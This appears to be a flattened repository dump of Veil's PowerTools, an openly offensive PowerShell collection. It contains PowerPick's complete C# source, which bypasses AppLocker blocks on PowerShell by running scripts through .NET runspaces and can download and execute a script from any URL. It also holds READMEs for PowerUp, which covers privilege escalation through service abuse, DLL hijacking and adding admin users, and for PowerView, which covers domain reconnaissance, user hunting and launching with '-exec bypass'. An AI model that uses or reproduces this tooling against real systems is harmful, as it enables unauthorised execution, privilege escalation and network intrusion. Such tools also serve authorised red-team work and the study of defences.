[PowerTools](https://github.com/Veil-Framework/PowerTools) 13 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual C# Express 2010 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PowerPick", "PowerPick\PowerPick.csproj", "{5ED2F78E-8538-4C87-BCED-E19E9DAD879C}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|x86 = Debug|x86 9 | Release|x86 = Release|x86 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {5ED2F78E-8538-4C87-BCED-E19E9DAD879C}.Debug|x86.ActiveCfg = Debug|x86 13 | {5ED2F78E-8538-4C87-BCED-E19E9DAD879C}.Debug|x86.Build.0 = Debug|x86 14 | {5ED2F78E-8538-4C87-BCED-E19E9DAD879C}.Release|x86.ActiveCfg = Release|x86 15 | {5ED2F78E-8538-4C87-BCED-E19E9DAD879C}.Release|x86.Build.0 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/PowerPick.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | Debug 5 | x86 6 | 8.0.30703 7 | 2.0 8 | {5ED2F78E-8538-4C87-BCED-E19E9DAD879C} 9 | Exe 10 | Properties 11 | PowerPick 12 | PowerPick 13 | v4.0 14 | Client 15 | 512 16 | publish\ 17 | true 18 | Disk 19 | false 20 | Foreground 21 | 7 22 | Days 23 | false 24 | false 25 | true 26 | 0 27 | 1.0.0.%2a 28 | false 29 | false 30 | true 31 | 32 | 33 | x86 34 | true 35 | full 36 | false 37 | bin\Debug\ 38 | DEBUG;TRACE 39 | prompt 40 | 4 41 | 42 | 43 | x86 44 | pdbonly 45 | true 46 | bin\Release\ 47 | TRACE 48 | prompt 49 | 4 50 | 51 | 52 | 53 | 54 | 55 | False 56 | ..\..\..\..\..\..\..\Program Files\Reference Assemblies\Microsoft\WindowsPowerShell\v1.0\System.Management.Automation.dll 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | True 69 | True 70 | Resources.resx 71 | 72 | 73 | 74 | 75 | ResXFileCodeGenerator 76 | Resources.Designer.cs 77 | 78 | 79 | 80 | 81 | False 82 | Microsoft .NET Framework 4 Client Profile %28x86 and x64%29 83 | true 84 | 85 | 86 | False 87 | .NET Framework 3.5 SP1 Client Profile 88 | false 89 | 90 | 91 | False 92 | .NET Framework 3.5 SP1 93 | false 94 | 95 | 96 | False 97 | Windows Installer 3.1 98 | true 99 | 100 | 101 | 102 | 109 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/PowerPick.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | en-US 11 | false 12 | 13 | 14 | -f c:\users\sixdub\desktop\test.ps1 15 | 16 | 17 | -f c:\users\sixdub\desktop\test.ps1 18 | 19 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/Program.cs: -------------------------------------------------------------------------------- 1 | /* 2 | * PowerPick aka InexorablePoSH 3 | * Description: Application to load and run powershell code via the .NET assemblies 4 | * License: 3-Clause BSD License. See Veil PowerTools Project 5 | * 6 | * This application is part of Veil PowerTools, a collection of offensive PowerShell 7 | * capabilities. Hope they help! 8 | */ 9 | 10 | using System; 11 | using System.IO; 12 | using System.Resources; 13 | using System.Collections.Generic; 14 | using System.Linq; 15 | using System.Text; 16 | using System.Net; 17 | 18 | //Adding libraries for powershell stuff 19 | using System.Collections.ObjectModel; 20 | using System.Management.Automation; 21 | using System.Management.Automation.Runspaces; 22 | 23 | 24 | namespace PowerPick 25 | { 26 | class Program 27 | { 28 | static string RunPS(string cmd) 29 | { 30 | //Init stuff 31 | Runspace runspace = RunspaceFactory.CreateRunspace(); 32 | runspace.Open(); 33 | RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace); 34 | Pipeline pipeline = runspace.CreatePipeline(); 35 | 36 | //Add commands 37 | pipeline.Commands.AddScript(cmd); 38 | 39 | //Prep PS for string output and invoke 40 | pipeline.Commands.Add("Out-String"); 41 | Collection results = pipeline.Invoke(); 42 | runspace.Close(); 43 | 44 | //Convert records to strings 45 | StringBuilder stringBuilder = new StringBuilder(); 46 | foreach (PSObject obj in results) 47 | { 48 | stringBuilder.Append(obj); 49 | } 50 | return stringBuilder.ToString().Trim(); 51 | } 52 | 53 | static void PrintHelp() 54 | { 55 | Console.Write("InexorablePoSH\n" + 56 | "Workaround for AppLocker deny of Powershell using .NET\n" + 57 | "\n" + 58 | "inexorableposh.exe [ ]\n" + 59 | "flags:\n" + 60 | "-f : Read script from specified file\n" + 61 | "-r : Read script from specified resource\n" + 62 | "-d : Read script from URL\n" + 63 | "-a : Read script appended to current binary after specified delimeter. Delimeter should be very very unique string\n" + 64 | "-c : PowerShell command to execute, enclosed on quotes."); 65 | } 66 | 67 | static int Main(string[] args) 68 | { 69 | string script; 70 | 71 | //Check the options 72 | if (args.Length != 2) 73 | { 74 | Console.WriteLine("[!] Error: Proper arguments required"); 75 | PrintHelp(); 76 | return -1; 77 | } 78 | 79 | //define our flag and argument 80 | string flag = args[0]; 81 | string optarg = args[1]; 82 | 83 | //Check all our options for the flag 84 | //When found right flag, get the script variable in the specified manner 85 | if (flag == "-f") 86 | { 87 | //read file from disk and pass to powershell 88 | try 89 | { 90 | script = System.IO.File.ReadAllText(optarg); 91 | } 92 | catch 93 | { 94 | Console.WriteLine("[!] Error: File Fail"); 95 | return (-1); 96 | } 97 | } 98 | else if (flag == "-r") 99 | { 100 | //Read powershell from resource of a specific name 101 | try 102 | { 103 | script = Properties.Resources.ResourceManager.GetString(optarg); 104 | } 105 | catch 106 | { 107 | Console.WriteLine("[!] Error: Resource Fail"); 108 | return (-1); 109 | } 110 | } 111 | else if (flag == "-d") 112 | { 113 | //download the script 114 | try 115 | { 116 | WebClient psdown = new WebClient(); 117 | script = psdown.DownloadString(optarg); 118 | } 119 | catch 120 | { 121 | Console.WriteLine("[!] Error: Download Fail"); 122 | return (-1); 123 | } 124 | } 125 | else if (flag == "-a") 126 | { 127 | try 128 | { 129 | string self = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName; 130 | string selfcontent = System.IO.File.ReadAllText(self); 131 | script = selfcontent.Split(new string[] { optarg }, StringSplitOptions.None)[1]; 132 | } 133 | catch 134 | { 135 | Console.WriteLine("[!] Error: Append Read fail"); 136 | return (-1); 137 | } 138 | } 139 | else if (flag == "-c") 140 | { 141 | try 142 | { 143 | script = optarg; 144 | } 145 | catch 146 | { 147 | Console.WriteLine("[!] Error: Command fail"); 148 | return (-1); 149 | } 150 | } 151 | else 152 | { 153 | Console.WriteLine("[!] Error: Improper flag"); 154 | PrintHelp(); 155 | return (-1); 156 | } 157 | 158 | //We should now have the script variable filled... double check before executing 159 | if (script != null) 160 | { 161 | string results = RunPS(script); 162 | Console.Write(results); 163 | } 164 | return 0; 165 | 166 | } 167 | } 168 | } 169 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("PowerPick")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("PowerPick")] 13 | [assembly: AssemblyCopyright("Copyright © 2014")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("ee46098e-3711-4c27-a61a-9b51cf637346")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.18444 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace PowerPick.Properties { 12 | using System; 13 | 14 | 15 | /// 16 | /// A strongly-typed resource class, for looking up localized strings, etc. 17 | /// 18 | // This class was auto-generated by the StronglyTypedResourceBuilder 19 | // class via a tool like ResGen or Visual Studio. 20 | // To add or remove a member, edit your .ResX file then rerun ResGen 21 | // with the /str option, or rebuild your VS project. 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources { 26 | 27 | private static global::System.Resources.ResourceManager resourceMan; 28 | 29 | private static global::System.Globalization.CultureInfo resourceCulture; 30 | 31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 32 | internal Resources() { 33 | } 34 | 35 | /// 36 | /// Returns the cached ResourceManager instance used by this class. 37 | /// 38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 39 | internal static global::System.Resources.ResourceManager ResourceManager { 40 | get { 41 | if (object.ReferenceEquals(resourceMan, null)) { 42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("PowerPick.Properties.Resources", typeof(Resources).Assembly); 43 | resourceMan = temp; 44 | } 45 | return resourceMan; 46 | } 47 | } 48 | 49 | /// 50 | /// Overrides the current thread's CurrentUICulture property for all 51 | /// resource lookups using this strongly typed resource class. 52 | /// 53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 54 | internal static global::System.Globalization.CultureInfo Culture { 55 | get { 56 | return resourceCulture; 57 | } 58 | set { 59 | resourceCulture = value; 60 | } 61 | } 62 | 63 | /// 64 | /// Looks up a localized string similar to Get-Process. 65 | /// 66 | internal static string Script { 67 | get { 68 | return ResourceManager.GetString("Script", resourceCulture); 69 | } 70 | } 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | Get-Process 122 | 123 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Debug/PowerPick.vshost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Debug/PowerPick.vshost.exe -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Debug/PowerPick.vshost.exe.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Release/PowerPick.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Release/PowerPick.exe -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Release/PowerPick.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/bin/Release/PowerPick.pdb -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.Properties.Resources.resources -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\bin\Release\PowerPick.exe 2 | C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\bin\Release\PowerPick.pdb 3 | C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.csprojResolveAssemblyReference.cache 4 | C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.Properties.Resources.resources 5 | C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.csproj.GenerateResource.Cache 6 | C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.exe 7 | C:\Users\sixdub\Documents\Visual Studio 2010\Projects\PowerPick\PowerPick\obj\x86\Release\PowerPick.pdb 8 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.exe -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/PowerPick.pdb -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/TempPE/Properties.Resources.Designer.cs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerPick/PowerPick/obj/x86/Release/TempPE/Properties.Resources.Designer.cs.dll -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/README.md: -------------------------------------------------------------------------------- 1 | Previously named InexorablePoSH. This repo contains a .NET application that provides the capability to work around a AppLocker blacklist on the PowerShell process. It uses the backend assemblies to load and execute PowerShell. 2 | 3 | Many thanks to those in the offensive powershell community. This work is not ground breaking but hopefully will motivate offense and defense to understand the implications and lack of protections available. 4 | 5 | If you have a really awesome use case, let me know! 6 | 7 | ## Man Page 8 | powerpick.exe [ ] 9 | flags: 10 | -f : Read script from specified file 11 | -r : Read script from specified resource 12 | -d : Read script from URL 13 | -a : Read script appended to current binary after specified delimeter. Delimeter should be very very unique string 14 | 15 | More details [here](https://github.com/Veil-Framework/PowerTools) 16 | 17 | Developed by [@sixdub](https://twitter.com/sixdub) 18 | 19 | Part of Veil's [PowerTools](https://github.com/Veil-Framework/PowerTools) 20 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerUp/PowerUp.psd1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerUp/PowerUp.psd1 -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerUp/PowerUp.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerUp/README.md: -------------------------------------------------------------------------------- 1 | #PowerUp 2 | 3 | PowerUp is a powershell tool to assist with local privilege escalation on 4 | Windows systems. It contains several methods to identify and abuse 5 | vulnerable services, as well as DLL hijacking opportunities, vulnerable 6 | registry settings, and escalation opportunities. 7 | 8 | Developed by [@harmj0y](https://twitter.com/harmj0y) 9 | 10 | Part of Veil's [PowerTools](https://github.com/Veil-Framework/PowerTools) 11 | 12 | 13 | ## Service Enumeration: 14 | Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name 15 | Get-ServiceEXEPerms - returns services where the current user can write to the service binary path 16 | Get-ServicePerms - returns services the current user can modify 17 | 18 | ## Service Abuse: 19 | Invoke-ServiceUserAdd - modifies a modifiable service to create a user and add it to the local administrators 20 | Write-UserAddServiceBinary - writes out a patched C# service binary that adds a local administrative user 21 | Write-ServiceEXE - replaces a service binary with one that adds a local administrator user 22 | Restore-ServiceEXE - restores a replaced service binary with the original executable 23 | 24 | ## DLL Hijacking: 25 | Invoke-FindDLLHijack - finds DLL hijacking opportunities for currently running processes 26 | Invoke-FindPathHijack - finds service %PATH% .DLL hijacking opportunities 27 | 28 | ## Registry Checks: 29 | Get-RegAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set 30 | Get-RegAutoLogon - checks for Autologon credentials in the registry 31 | 32 | ## Misc. Checks: 33 | Get-UnattendedInstallFiles - finds remaining unattended installation files 34 | Get-Webconfig - checks for any encrypted web.config strings 35 | Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords 36 | 37 | ## Helpers: 38 | Invoke-AllChecks - runs all current escalation checks and returns a report 39 | Write-UserAddMSI - write out a MSI installer that prompts for a user to be added 40 | Invoke-ServiceStart - starts a given service 41 | Invoke-ServiceStop - stops a given service 42 | Invoke-ServiceEnable - enables a given service 43 | Invoke-ServiceDisable - disables a given service 44 | Get-ServiceDetails - returns detailed information about a service 45 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerView/LICENSE: -------------------------------------------------------------------------------- 1 | PowerView is provided under the 3-clause BSD license below. 2 | 3 | ************************************************************* 4 | 5 | Copyright (c) 2014, Will Schroeder 6 | All rights reserved. 7 | 8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 9 | 10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 15 | 16 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerView/README.md: -------------------------------------------------------------------------------- 1 | #PowerView 2 | 3 | PowerView is a PowerShell tool to gain network situational awareness on 4 | Windows domains. It contains a set of pure-PowerShell replacements for various 5 | windows "net *" commands, which utilize PowerShell AD hooks and underlying 6 | Win32 API functions to perform useful Windows domain functionality. 7 | 8 | It also impements various useful metafunctions, including a port 9 | of [Rob Fuller's](https://twitter.com/mubix) [netview.exe](https://github.com/mubix/netview) tool, 10 | and some custom-written 'UserHunter' functions which will identify where on the 11 | network specific users are logged into. It can also check which machines 12 | on the domain the current user has local administrator access on. See function 13 | descriptions for appropriate usage and available options. 14 | 15 | To run on a machine, start PowerShell with "powershell -exec bypass" and then load 16 | the powerview script: PS> Import-Module .\powerview.ps1 17 | 18 | For detailed output of underlying functionality, pass the -Debug flag to most functions. 19 | 20 | For functions that enumerate multiple machines, pass the -Verbose flag to get a 21 | progress status as each host is enumerated. Most of the "meta" functions accept 22 | an array of hosts from the pipeline. 23 | 24 | Developed by [@harmj0y](https://twitter.com/harmj0y) 25 | 26 | Part of Veil's [PowerTools](https://github.com/Veil-Framework/PowerTools) 27 | 28 | Thanks to: 29 | [@davidpmcguire](https://twitter.com/davidpmcguire) for inspiration, 30 | [@mubix](https://twitter.com/mubix) for building netview.exe and open sourcing it, 31 | [@obscuresec](https://twitter.com/obscuresec), [@mattifestation](https://twitter.com/mattifestation) and [darkoperator](https://twitter.com/Carlos_Perez) for examples and how to write proper PowerShell modules, 32 | zeknox, smilingraccoon, and r3dy for the [local_admin_search_enum](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb) idea in Metasploit, 33 | dunedinite, normanj, and powershellmagazine.com, for some (cited) examples to adapt and draw from 34 | 35 | 36 | ## Misc Functions: 37 | Get-HostIP - resolves a hostname to an IP 38 | Check-Write - checks if the current user can write to the specified file 39 | Set-MacAttribute - Sets MAC attributes for a file based on another file or input (from Powersploit) 40 | Invoke-CopyFile - copies a local file to a remote location, matching MAC properties 41 | Test-Server - tests connectivity to a specified server 42 | Get-UserProperties - returns all properties specified for users, or a set of user:prop names 43 | Get-ComputerProperties - returns all properties specified for computers, or a set of computer:prop names 44 | Get-LastLoggedOn - return the last logged on user for a target host 45 | Get-UserLogonEvents - returns logon events from the event log for a specified host 46 | Get-UserTGTEvents - returns TGT request events for a specified host 47 | Invoke-CheckLocalAdminAccess - check if the current user context has local administrator access 48 | to a specified host 49 | Invoke-SearchFiles - search a local or remote path for files with specific terms in the name 50 | 51 | 52 | ## net * Functions: 53 | Get-NetDomain - gets the name of the current user's domain 54 | Get-NetForest - gets the forest associated with the current user's domain 55 | Get-NetForestDomains - gets all domains for the current forest 56 | Get-NetDomainControllers - gets the domain controllers for the current computer's domain 57 | Get-NetCurrentUser - gets the current [domain\\]username 58 | Get-NetUser - returns all user objects, or the user specified (wildcard specifiable) 59 | Get-NetUserSPNs - gets all user ServicePrincipalNames 60 | Get-NetOUs - gets data for domain organization units 61 | Invoke-NetUserAdd - adds a local or domain user 62 | Get-NetGroups - gets a list of all current groups in the domain 63 | Get-NetGroup - gets data for each user in a specified domain group 64 | Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts 65 | Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts 66 | Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts 67 | Invoke-NetGroupUserAdd - adds a user to a specified local or domain group 68 | Get-NetComputers - gets a list of all current servers in the domain 69 | Get-NetFileServers - get a list of file servers used by current domain users 70 | Get-NetShare - gets share information for a specified server 71 | Get-NetLoggedon - gets users actively logged onto a specified server 72 | Get-NetSessions - gets active sessions on a specified server 73 | Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles 74 | Get-NetConnections - gets active connections to a specific server resource (share) 75 | Get-NetFiles - gets open files on a server 76 | Get-NetProcesses - gets the remote processes and owners on a remote server 77 | 78 | 79 | ## User-Hunting Functions: 80 | Invoke-UserHunter - finds machines on the local domain where specified users are 81 | logged into, and can optionally check if the current user has 82 | local admin access to found machines 83 | Invoke-UserHunterThreaded - threaded version of Invoke-UserHunter 84 | Invoke-StealthUserHunter - finds all file servers utilizes in user HomeDirectories, and checks 85 | the sessions one each file server, hunting for particular users 86 | Invoke-UserProcessHunter - hunts for processes on domain machines running under specific 87 | target user accounts 88 | Invoke-ProcessHunter - hunts for processes with a specific name on domain machines 89 | Invoke-UserEventHunter - hunts for user logon events in domain controller event logs 90 | 91 | 92 | ## Domain Trust Functions: 93 | Get-NetDomainTrusts - gets all trusts for the current user's domain 94 | Get-NetDomainTrustsLDAP - gets all trusts for the current user's domain using just LDAP 95 | queries. This is less accurate than Get-NetDomainTrusts but 96 | allows you to relay all traffic through your primary DC. 97 | Get-NetForestTrusts - gets all trusts for the forest associated with the current user's domain 98 | Invoke-FindUserTrustGroups - enumerates users who are in groups outside of their principal domain 99 | Invoke-FindAllUserTrustGroups - map all domain trusts and enumerate all users who are in groups outside 100 | of their principal domain 101 | Invoke-MapDomainTrusts - try to build a relational mapping of all domain trusts 102 | Invoke-MapDomainTrustsLDAP - try to build a relational mapping of all domain trusts using 103 | Get-NetDomainTrustsLDAP 104 | 105 | 106 | ## MetaFunctions: 107 | Invoke-Netview - a port of @mubix's netview.exe tool using Get-Net* functionality 108 | finds all machines on the local domain and runs various enumeration 109 | methods on what it finds 110 | Invoke-NetviewThreaded - threaded version of Invoke-NetView 111 | Invoke-UserView - returns parsable session/loggedon user data for a given domain 112 | Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain 113 | Invoke-ShareFinderThreaded - threaded version if Invoke-ShareFinder 114 | Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain 115 | Invoke-FileFinderThreaded - threaded version of Invoke-FileFinder 116 | Invoke-FindLocalAdminAccess - finds machines on the domain that the current user has local admin 117 | access to 118 | Invoke-FindLocalAdminAccesThreaded- threaded version of Invoke-FindLocalAdminAccess 119 | Invoke-UserFieldSearch - searches a user field for a particular term 120 | Invoke-ComputerFieldSearch - searches a computer field for a particular term 121 | Invoke-FindVulnSystems - finds systems likely vulnerable to MS08-067 122 | Invoke-HostEnum - run all available enumeration checks on a single host 123 | Invoke-EnumerateLocalAdmins - enumerates members of the local Administrators groups across all 124 | machines in the domain 125 | Invoke-EnumerateLocalAdminsThreaded-threaded version of Invoke-EnumerateLocalAdmins 126 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerView/powerview.psd1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PowerTools-master/PowerView/powerview.psd1 -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerView/powerview.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/README.md: -------------------------------------------------------------------------------- 1 | #PowerTools 2 | 3 | Veil's PowerTools are a collection of PowerShell projects with a focus 4 | on offensive operations. 5 | 6 | Developed by [@harmj0y](https://twitter.com/harmj0y) and [@sixdub](https://twitter.com/sixdub) 7 | -------------------------------------------------------------------------------- /net/Windows/SysinternalsSuite/ADExplorer.exe: -------------------------------------------------------------------------------- 